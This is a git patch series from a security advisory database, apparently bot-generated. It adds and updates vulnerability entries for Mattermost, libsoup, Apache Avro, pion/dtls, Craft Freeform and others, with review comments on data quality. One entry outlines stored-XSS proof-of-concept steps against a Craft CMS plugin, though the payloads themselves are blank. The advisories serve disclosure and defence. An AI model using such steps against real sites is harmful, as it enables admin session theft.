From aec00c2cbd4cb8041a8dfed18a91fa93bd740c3e Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 09:32:11 +0000
Subject: [PATCH 01/36] Publish GHSA-qvpr-vq7h-28cr
---
.../GHSA-qvpr-vq7h-28cr.json | 40 +++++++++++++++++++
1 file changed, 40 insertions(+)
create mode 100644 advisories/unreviewed/2026/02/GHSA-qvpr-vq7h-28cr/GHSA-qvpr-vq7h-28cr.json
diff --git a/advisories/unreviewed/2026/02/GHSA-qvpr-vq7h-28cr/GHSA-qvpr-vq7h-28cr.json b/advisories/unreviewed/2026/02/GHSA-qvpr-vq7h-28cr/GHSA-qvpr-vq7h-28cr.json
new file mode 100644
index 0000000000000..f232b9034d423
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qvpr-vq7h-28cr/GHSA-qvpr-vq7h-28cr.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qvpr-vq7h-28cr",
+ "modified": "2026-02-13T09:30:15Z",
+ "published": "2026-02-13T09:30:14Z",
+ "aliases": [
+ "CVE-2026-0872"
+ ],
+ "details": "Improper Certificate Validation vulnerability in Thales SafeNet Agent for Windows Logon on Windows allows Signature Spoofing by Improper Validation.This issue affects SafeNet Agent for Windows Logon: 4.0.0, 4.1.1, 4.1.2.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:H/SI:H/SA:L/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0872"
+ },
+ {
+ "type": "WEB",
+ "url": "https://supportportal.thalesgroup.com/csm?sys_kb_id=247fd4a42b4a7290061af3f5f291bff1&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=5ecb72c73b927610381ecfaf55e45a0b&sysparm_article=KB0030173"
+ },
+ {
+ "type": "WEB",
+ "url": "https://thalesdocs.com/sta/agents/wla-windows_logon/wla-preinstallation_passwordless/index.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-295"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T09:16:07Z"
+ }
+}
\ No newline at end of file
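Review bot: The `details` string on the new side carries a source typo, `Improper Validation.This issue affects`, with no space after the sentence break; the same pattern appears later in this series in GHSA-4p49-fwp8-38mv (`Privilege Escalation.This issue affects`), and GHSA-rp46-r563-jrc7 carries a garbled character in `versionĀ 1.12.0` where the upstream text most likely had a non-breaking space. These strings appear to be mirrored verbatim from NVD, so the place to handle them is the ingest step, not this file: normalize stray non-ASCII whitespace to a plain space and leave the CNA's punctuation as written. An empty `affected` here is expected for an unreviewed entry about a product that is not published to a package ecosystem.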
From 515754e9afb8551fdf6e84f7066241d3b1663533 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 12:33:19 +0000
Subject: [PATCH 02/36] Publish Advisories
GHSA-2xf7-hmf6-p64j
GHSA-9pj7-jh2r-87g8
GHSA-hg24-p7xv-jhq8
GHSA-rp46-r563-jrc7
---
.../GHSA-2xf7-hmf6-p64j.json | 36 +++++++++++++++++
.../GHSA-9pj7-jh2r-87g8.json | 36 +++++++++++++++++
.../GHSA-hg24-p7xv-jhq8.json | 40 +++++++++++++++++++
.../GHSA-rp46-r563-jrc7.json | 31 ++++++++++++++
4 files changed, 143 insertions(+)
create mode 100644 advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-hg24-p7xv-jhq8/GHSA-hg24-p7xv-jhq8.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json
diff --git a/advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json b/advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json
new file mode 100644
index 0000000000000..95e68291c6dcf
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2xf7-hmf6-p64j",
+ "modified": "2026-02-13T12:31:21Z",
+ "published": "2026-02-13T12:31:21Z",
+ "aliases": [
+ "CVE-2026-20796"
+ ],
+ "details": "Mattermost versions 10.11.x <= 10.11.9 fail to properly validate channel membership at the time of data retrieval which allows a deactivated user to learn team names they should not have access to via a race condition in the /common_teams API endpoint.. Mattermost Advisory ID: MMSA-2025-00549",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20796"
+ },
+ {
+ "type": "WEB",
+ "url": "https://mattermost.com/security-updates"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-367"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T11:16:10Z"
+ }
+}
\ No newline at end of file
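Review bot: `affected` is left as `[]` although `details` pins the vulnerable range precisely (`10.11.x <= 10.11.9`), so no version-matching consumer can act on this entry until it is reviewed; the sibling GHSA-9pj7-jh2r-87g8 in this same patch has the same shape with three bounds (`11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1`). Mattermost server is, as far as I know, distributed as a Go module, which makes both entries candidates for early review that turns those bounds into `ranges`. The doubled period before `Mattermost Advisory ID` is in the source text and is harmless.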
diff --git a/advisories/unreviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json b/advisories/unreviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json
new file mode 100644
index 0000000000000..7bf26503735af
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9pj7-jh2r-87g8",
+ "modified": "2026-02-13T12:31:21Z",
+ "published": "2026-02-13T12:31:21Z",
+ "aliases": [
+ "CVE-2026-22892"
+ ],
+ "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to validate user permissions when creating Jira issues from Mattermost posts, which allows an authenticated attacker with access to the Jira plugin to read post content and attachments from channels they do not have access to via the /create-issue API endpoint by providing the post ID of an inaccessible post.. Mattermost Advisory ID: MMSA-2025-00550",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22892"
+ },
+ {
+ "type": "WEB",
+ "url": "https://mattermost.com/security-updates"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-863"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T11:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-hg24-p7xv-jhq8/GHSA-hg24-p7xv-jhq8.json b/advisories/unreviewed/2026/02/GHSA-hg24-p7xv-jhq8/GHSA-hg24-p7xv-jhq8.json
new file mode 100644
index 0000000000000..0db353f7cace6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-hg24-p7xv-jhq8/GHSA-hg24-p7xv-jhq8.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-hg24-p7xv-jhq8",
+ "modified": "2026-02-13T12:31:21Z",
+ "published": "2026-02-13T12:31:21Z",
+ "aliases": [
+ "CVE-2026-2443"
+ ],
+ "details": "A flaw was identified in libsoup, a widely used HTTP library in GNOME-based systems. When processing specially crafted HTTP Range headers, the library may improperly validate requested byte ranges. In certain build configurations, this could allow a remote attacker to access portions of server memory beyond the intended response. Exploitation requires a vulnerable configuration and access to a server using the embedded SoupServer component.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2443"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2026-2443"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439671"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-125"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T12:16:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json b/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json
new file mode 100644
index 0000000000000..c3e366958502c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rp46-r563-jrc7",
+ "modified": "2026-02-13T12:31:21Z",
+ "published": "2026-02-13T12:31:21Z",
+ "aliases": [
+ "CVE-2025-33042"
+ ],
+ "details": "Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Avro Java SDK when generating specific records from untrusted Avro schemas.\n\nThis issue affects Apache Avro Java SDK: all versions through 1.11.4 and versionĀ 1.12.0.\n\nUsers are recommended to upgrade to version 1.12.1 or 1.11.5, which fix the issue.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33042"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.apache.org/thread/fy88wmgf1lj9479vrpt12cv8x73lroj1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T12:16:07Z"
+ }
+}
\ No newline at end of file
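Review bot: `severity` is `[]` and `database_specific.severity` is `null` for a code-injection advisory (`CWE-94`) whose `details` already names the fixed releases (`1.12.1` and `1.11.5`) and the affected ones (`all versions through 1.11.4` and `1.12.0`), while `affected` stays `[]`. The Avro Java SDK ships as a Maven artifact, so this entry can be reviewed into concrete `ranges` without waiting on NVD scoring, and the stated version bounds are enough to do it. Until then, consumers matching on package version will not surface this one at all.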
From d7e63b271d3d7419163046475898ebb606762591 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 14:20:38 +0000
Subject: [PATCH 03/36] Publish GHSA-9f3f-wv7r-qc8r
---
.../GHSA-9f3f-wv7r-qc8r.json | 38 +++++++++++++++++--
1 file changed, 34 insertions(+), 4 deletions(-)
diff --git a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json
index f05345733c000..c4b1a394cd1e4 100644
--- a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json
+++ b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-9f3f-wv7r-qc8r",
- "modified": "2026-02-12T22:07:22Z",
+ "modified": "2026-02-13T14:18:28Z",
"published": "2026-02-11T15:13:12Z",
"aliases": [
"CVE-2026-26014"
@@ -25,13 +25,16 @@
"type": "ECOSYSTEM",
"events": [
{
- "introduced": "0"
+ "introduced": "3.1.0"
},
{
- "fixed": "3.1.0"
+ "fixed": "3.1.1"
}
]
}
+ ],
+ "versions": [
+ "3.1.0"
]
},
{
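Review bot: The existing range is narrowed from `[0, 3.1.0)` to `[3.1.0, 3.1.1)` and a `versions` list of just `3.1.0` is added, while the next hunk adds a second `affected` entry for `github.com/pion/dtls/v3` covering `[0, 3.0.11)`; this is the right shape for a fix backported to the 3.0.x branch only if the first entry's `package` (above this hunk) is the same module. If it is, the two entries together say that 3.0.11 through the last 3.0.x release are not affected, which should agree with the v3.0.11 release notes the references hunk now links; if the first entry names a different module path, a `3.1.0` bound there would be inconsistent. Worth a one-line check of the `package.name` just above this hunk.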
@@ -71,6 +74,25 @@
]
}
]
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/pion/dtls/v3"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.0.11"
+ }
+ ]
+ }
+ ]
}
],
"references": [
@@ -90,13 +112,21 @@
"type": "WEB",
"url": "https://github.com/pion/dtls/commit/61762dee8217991882c5eb79856b9e7a73ee349f"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/pion/dtls/commit/90e241cfec2985715efdd3d005972847462a67d6"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/pion/dtls"
},
{
"type": "WEB",
- "url": "https://github.com/pion/dtls/releases/tag/v3.1.0"
+ "url": "https://github.com/pion/dtls/releases/tag/v3.0.11"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pion/dtls/releases/tag/v3.1.1"
}
],
"database_specific": {
From e912a16550074cae1167f82cfbfdf518d0871433 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 14:58:52 +0000
Subject: [PATCH 04/36] Publish GHSA-jp3q-wwp3-pwv9
---
.../GHSA-jp3q-wwp3-pwv9.json | 20 ++++++++++++++++---
1 file changed, 17 insertions(+), 3 deletions(-)
diff --git a/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json b/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json
index fa33bbc866cc0..f090ff0e06d20 100644
--- a/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json
+++ b/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json
@@ -1,9 +1,11 @@
{
"schema_version": "1.4.0",
"id": "GHSA-jp3q-wwp3-pwv9",
- "modified": "2026-02-10T13:47:10Z",
+ "modified": "2026-02-13T14:57:31Z",
"published": "2026-01-22T21:41:14Z",
- "aliases": [],
+ "aliases": [
+ "CVE-2026-26188"
+ ],
"summary": "Freeform Craft Plugin CP UI (builder/integrations) has Stored Cross-Site Scripting (XSS) issue",
"details": "**Summary**\nAn authenticated, low-privilege user (able to create/edit forms) can inject arbitrary HTML/JS into the Craft Control Panel (CP) builder and integrations views. User-controlled form labels and integration metadata are rendered with `dangerouslySetInnerHTML` without sanitization, leading to stored XSS that executes when any admin views the builder/integration screens.\n\n**Affected Product**\n- Ecosystem: Packagist (Craft CMS plugin)\n- Package: solspace/craft-freeform\n- Version: <= 5.14.6 (latest observed). Likely all 5.x until patched.\n\n**Details**\n- Root cause: Multiple user-controlled strings (field labels, section labels, integration icons, short names, WYSIWYG previews) are injected into React components using `dangerouslySetInnerHTML` without sanitization.\n- Evidence: `dangerouslySetInnerHTML` on user-controlled properties in bundled CP JS at [packages/plugin/src/Resources/js/client/client.js](packages/plugin/src/Resources/js/client/client.js#L1).\n\n**PoCs**\n- Label-based XSS:\n 1. In Craft CP, create/edit a Freeform field and set its label to `
`.\n 2. Open the form builder view containing the field.\n 3. Alert executes (stored XSS).\n- Integration icon SVG:\n 1. Set an integration \"icon SVG\" to ``.\n 2. Open the integrations CP view.\n 3. Script executes.\n\n**Impact**\nArbitrary JS in admin CP; session/CSRF token theft; potential full admin takeover via DOM-driven actions.\n\n**Remediation**\n- Sanitize/HTML-encode all user-controlled strings before passing to `dangerouslySetInnerHTML`, or avoid it for labels/titles/icons.\n- Server-side: strip/escape disallowed tags on save for fields, integration metadata, WYSIWYG content.\n- Add regression tests with `
` payloads to ensure no execution in builder/integration views.\n\n**Workarounds**\n- Restrict form-edit permissions to trusted admins only until patched.\n- Consider CSP that disallows inline scripts (defense-in-depth only).\n\n**Credits**\n- Discovered by https://www.linkedin.com/in/praveenkavinda/ | Prav33N-Sec.",
"severity": [
@@ -41,9 +43,21 @@
"type": "WEB",
"url": "https://github.com/solspace/craft-freeform/security/advisories/GHSA-jp3q-wwp3-pwv9"
},
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26188"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/solspace/craft-freeform/commit/b9adad6cdf1eba5400aae8b1ae39bd7d4d33af5e"
+ },
{
"type": "PACKAGE",
"url": "https://github.com/solspace/craft-freeform"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/solspace/craft-freeform/releases/tag/v5.14.7"
}
],
"database_specific": {
@@ -53,6 +67,6 @@
"severity": "LOW",
"github_reviewed": true,
"github_reviewed_at": "2026-01-22T21:41:14Z",
- "nvd_published_at": null
+ "nvd_published_at": "2026-02-12T23:16:09Z"
}
}
\ No newline at end of file
From bc2ffab8a114dec112114cac6ae81cf3673edae1 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]"
<45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 13 Feb 2026 15:32:20 +0000
Subject: [PATCH 05/36] Publish Advisories
GHSA-mpwp-whhg-qqx4
GHSA-22m6-6xhc-4ffw
GHSA-25c8-jwjc-6mjh
GHSA-366r-6rjw-f277
GHSA-4m8q-p6h8-x2wj
GHSA-4p49-fwp8-38mv
GHSA-5m2c-5h5x-7j8g
GHSA-8qwr-rrp6-9jjv
GHSA-8xrx-9wj4-6775
GHSA-cqx4-h5ph-3xj9
GHSA-hpj8-5pv7-f58m
GHSA-jh9m-9mr6-3ghc
GHSA-jjrf-jfrm-p64x
GHSA-pmfg-h9xp-96jh
GHSA-q3vc-646j-prpq
GHSA-r5cf-37x9-4hgv
GHSA-rp46-r563-jrc7
GHSA-wp4v-6rrv-wqv9
GHSA-wxwg-9693-mqg4
GHSA-xgwv-vx48-69hc
---
.../GHSA-mpwp-whhg-qqx4.json | 4 +-
.../GHSA-22m6-6xhc-4ffw.json | 36 +++++++++++++
.../GHSA-25c8-jwjc-6mjh.json | 6 ++-
.../GHSA-366r-6rjw-f277.json | 11 ++--
.../GHSA-4m8q-p6h8-x2wj.json | 11 ++--
.../GHSA-4p49-fwp8-38mv.json | 36 +++++++++++++
.../GHSA-5m2c-5h5x-7j8g.json | 6 ++-
.../GHSA-8qwr-rrp6-9jjv.json | 6 ++-
.../GHSA-8xrx-9wj4-6775.json | 11 ++--
.../GHSA-cqx4-h5ph-3xj9.json | 6 ++-
.../GHSA-hpj8-5pv7-f58m.json | 11 ++--
.../GHSA-jh9m-9mr6-3ghc.json | 49 +++++++++++++++++
.../GHSA-jjrf-jfrm-p64x.json | 53 +++++++++++++++++++
.../GHSA-pmfg-h9xp-96jh.json | 3 +-
.../GHSA-q3vc-646j-prpq.json | 36 +++++++++++++
.../GHSA-r5cf-37x9-4hgv.json | 11 ++--
.../GHSA-rp46-r563-jrc7.json | 6 ++-
.../GHSA-wp4v-6rrv-wqv9.json | 11 ++--
.../GHSA-wxwg-9693-mqg4.json | 11 ++--
.../GHSA-xgwv-vx48-69hc.json | 36 +++++++++++++
20 files changed, 332 insertions(+), 28 deletions(-)
create mode 100644 advisories/unreviewed/2026/02/GHSA-22m6-6xhc-4ffw/GHSA-22m6-6xhc-4ffw.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-4p49-fwp8-38mv/GHSA-4p49-fwp8-38mv.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-jh9m-9mr6-3ghc/GHSA-jh9m-9mr6-3ghc.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-jjrf-jfrm-p64x/GHSA-jjrf-jfrm-p64x.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json
diff --git a/advisories/unreviewed/2026/01/GHSA-mpwp-whhg-qqx4/GHSA-mpwp-whhg-qqx4.json b/advisories/unreviewed/2026/01/GHSA-mpwp-whhg-qqx4/GHSA-mpwp-whhg-qqx4.json
index 85d3b133235be..0f75d1d732e20 100644
--- a/advisories/unreviewed/2026/01/GHSA-mpwp-whhg-qqx4/GHSA-mpwp-whhg-qqx4.json
+++ b/advisories/unreviewed/2026/01/GHSA-mpwp-whhg-qqx4/GHSA-mpwp-whhg-qqx4.json
@@ -25,7 +25,9 @@
}
],
"database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-415"
+ ],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2026/02/GHSA-22m6-6xhc-4ffw/GHSA-22m6-6xhc-4ffw.json b/advisories/unreviewed/2026/02/GHSA-22m6-6xhc-4ffw/GHSA-22m6-6xhc-4ffw.json
new file mode 100644
index 0000000000000..097b91a57a611
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-22m6-6xhc-4ffw/GHSA-22m6-6xhc-4ffw.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-22m6-6xhc-4ffw",
+ "modified": "2026-02-13T15:30:27Z",
+ "published": "2026-02-13T15:30:27Z",
+ "aliases": [
+ "CVE-2026-1578"
+ ],
+ "details": "HP App for Android is potentially vulnerable to cross-site scripting (XSS) when using an outdated version of the application via mobile devices. HP is releasing updates to mitigate these potential vulnerabilities.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1578"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.hp.com/us-en/document/ish_14083522-14083606-16/hpsbgn04082"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T15:15:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-25c8-jwjc-6mjh/GHSA-25c8-jwjc-6mjh.json b/advisories/unreviewed/2026/02/GHSA-25c8-jwjc-6mjh/GHSA-25c8-jwjc-6mjh.json
index df07d89ac6fc7..4220712a92a0b 100644
--- a/advisories/unreviewed/2026/02/GHSA-25c8-jwjc-6mjh/GHSA-25c8-jwjc-6mjh.json
+++ b/advisories/unreviewed/2026/02/GHSA-25c8-jwjc-6mjh/GHSA-25c8-jwjc-6mjh.json
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-25c8-jwjc-6mjh",
- "modified": "2026-02-05T21:32:39Z",
+ "modified": "2026-02-13T15:30:23Z",
"published": "2026-02-05T18:30:30Z",
"aliases": [
"CVE-2025-68722"
@@ -19,6 +19,10 @@
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68722"
},
+ {
+ "type": "WEB",
+ "url": "https://github.com/osmancanvural/CVE-2025-68722"
+ },
{
"type": "WEB",
"url": "https://www.axigen.com/knowledgebase/Axigen-WebAdmin-CSRF-Vulnerability-CVE-2025-68722-_407.html"
diff --git a/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json b/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json
index d4979bea0bd98..1ba079289f53f 100644
--- a/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json
+++ b/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-366r-6rjw-f277",
- "modified": "2026-02-12T00:31:04Z",
+ "modified": "2026-02-13T15:30:23Z",
"published": "2026-02-12T00:31:04Z",
"aliases": [
"CVE-2026-20646"
],
"details": "A logging issue was addressed with improved data redaction. This issue is fixed in macOS Tahoe 26.3. A malicious app may be able to read sensitive location information.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
"affected": [],
"references": [
{
@@ -21,7 +26,7 @@
],
"database_specific": {
"cwe_ids": [],
- "severity": null,
+ "severity": "LOW",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T23:16:07Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json
index c9a3d93f490a4..406dcef173473 100644
--- a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json
+++ b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json
@@ -1,13 +1,18 @@
{
"schema_version": "1.4.0",
"id": "GHSA-4m8q-p6h8-x2wj",
- "modified": "2026-02-12T00:31:05Z",
+ "modified": "2026-02-13T15:30:24Z",
"published": "2026-02-12T00:31:05Z",
"aliases": [
"CVE-2026-20654"
],
"details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to cause unexpected system termination.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
"affected": [],
"references": [
{
@@ -37,7 +42,7 @@
],
"database_specific": {
"cwe_ids": [],
- "severity": null,
+ "severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T23:16:08Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-4p49-fwp8-38mv/GHSA-4p49-fwp8-38mv.json b/advisories/unreviewed/2026/02/GHSA-4p49-fwp8-38mv/GHSA-4p49-fwp8-38mv.json
new file mode 100644
index 0000000000000..96a1aaa4dd87b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4p49-fwp8-38mv/GHSA-4p49-fwp8-38mv.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4p49-fwp8-38mv",
+ "modified": "2026-02-13T15:30:26Z",
+ "published": "2026-02-13T15:30:26Z",
+ "aliases": [
+ "CVE-2026-1618"
+ ],
+ "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Universal Software Inc. FlexCity/Kiosk allows Privilege Escalation.This issue affects FlexCity/Kiosk: from 1.0 before 1.0.36.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1618"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usom.gov.tr/bildirim/tr-26-0065"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-288"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-13T14:16:09Z"
+ }
+}
\ No newline at end of file
